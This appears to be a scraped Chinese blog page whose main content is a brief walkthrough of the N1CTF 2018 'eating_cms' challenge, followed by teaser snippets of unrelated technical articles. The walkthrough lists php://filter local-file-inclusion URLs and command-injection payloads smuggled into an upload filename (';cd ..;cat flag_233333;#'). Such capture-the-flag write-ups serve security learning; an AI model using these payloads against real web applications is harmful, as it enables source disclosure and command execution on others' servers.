news 2026/3/30 15:12:25

[N1CTF 2018]eating_cms

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
[N1CTF 2018]eating_cms

随便输入账号密码,没什么提示,试一下有没有注册界面register.php

注册并登录

试一下伪协议读取源码/user.php?page=php://filter/convert.base64-encode/resource=user

注意到这里有function.php

/user.php?page=php://filter/convert.base64-encode/resource=function

读取/user.php?page=php://filter/convert.base64-encode/resource=ffffllllaaaaggg

但不成功

查了一下,得用这个url

//user.php?page=php://filter/convert.base64-encode/resource=ffffllllaaaaggg

读取m4aaannngggeee

/user.php?page=m4aaannngggeee

应该是文件上传,抓包,修改文件名

尝试切到根目录的时候,发现/被过滤了,使用cd ..
payload:;cd ..;ls;#

读取flag:;cd ..;cat flag_233333;#

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/3/24 0:12:16

Excalidraw容器化部署:Docker Compose快速上手教程

Excalidraw 容器化部署:Docker Compose 快速上手实践 在远程协作日益成为常态的今天,技术团队对轻量级、高可用的可视化工具需求愈发迫切。无论是架构师在白板上勾勒系统拓扑,还是产品团队快速绘制原型草图,一个响应迅速、操作直…

作者头像 李华
网站建设 2026/3/18 8:34:44

基于ERNIE-4.5-VL的智能医疗问诊系统构建(RAG+多Agent协同)

本文介绍了基于ERNIE-4.5-VL-28B-A3B-Paddle多模态大模型构建的智能医疗问诊系统,通过FastDeploy实现本地化部署,结合ChromaDB知识库和多Agent协同机制,支持文本图像多模态输入。该系统从症状描述到治疗建议提供全流程智能问诊,平…

作者头像 李华
网站建设 2026/3/30 6:29:57

基于python的宠物寄领养医疗网站宠物医院管理系统的设计与实现_6fmr5z12

文章目录系统截图项目技术简介可行性分析主要运用技术介绍核心代码参考示例结论源码lw获取/同行可拿货,招校园代理 :文章底部获取博主联系方式!系统截图 基于python的宠物寄领养医疗网站宠物医院管理系统的设计与实现_6fmr5z12 项目技术简介 P…

作者头像 李华
网站建设 2026/3/29 16:24:59

Excalidraw与Miro对比:谁更适合技术团队?

Excalidraw 与 Miro 对比:技术团队的协作工具之选 在一场深夜的技术评审会上,后端架构师正试图用鼠标拖拽出一个“清晰”的微服务依赖图。页面卡顿、组件错位、格式混乱——最终他放弃美化,只留下一堆潦草的文字框和箭头。“先这样吧&#xf…

作者头像 李华
网站建设 2026/3/26 18:43:05

66、虚拟机器使用指南:Hyper - V 与 Windows 10 版本解析

虚拟机器使用指南:Hyper - V 与 Windows 10 版本解析 1. 虚拟磁盘设置 在创建虚拟机时,确定磁盘名称和位置后,还需设置磁盘大小(以 GB 为单位)。要确保磁盘能容纳操作系统、程序和数据,但也不必过于谨慎,因为 VHDX 文件的大小更接近实际使用空间,而非用户设定的最大值…

作者头像 李华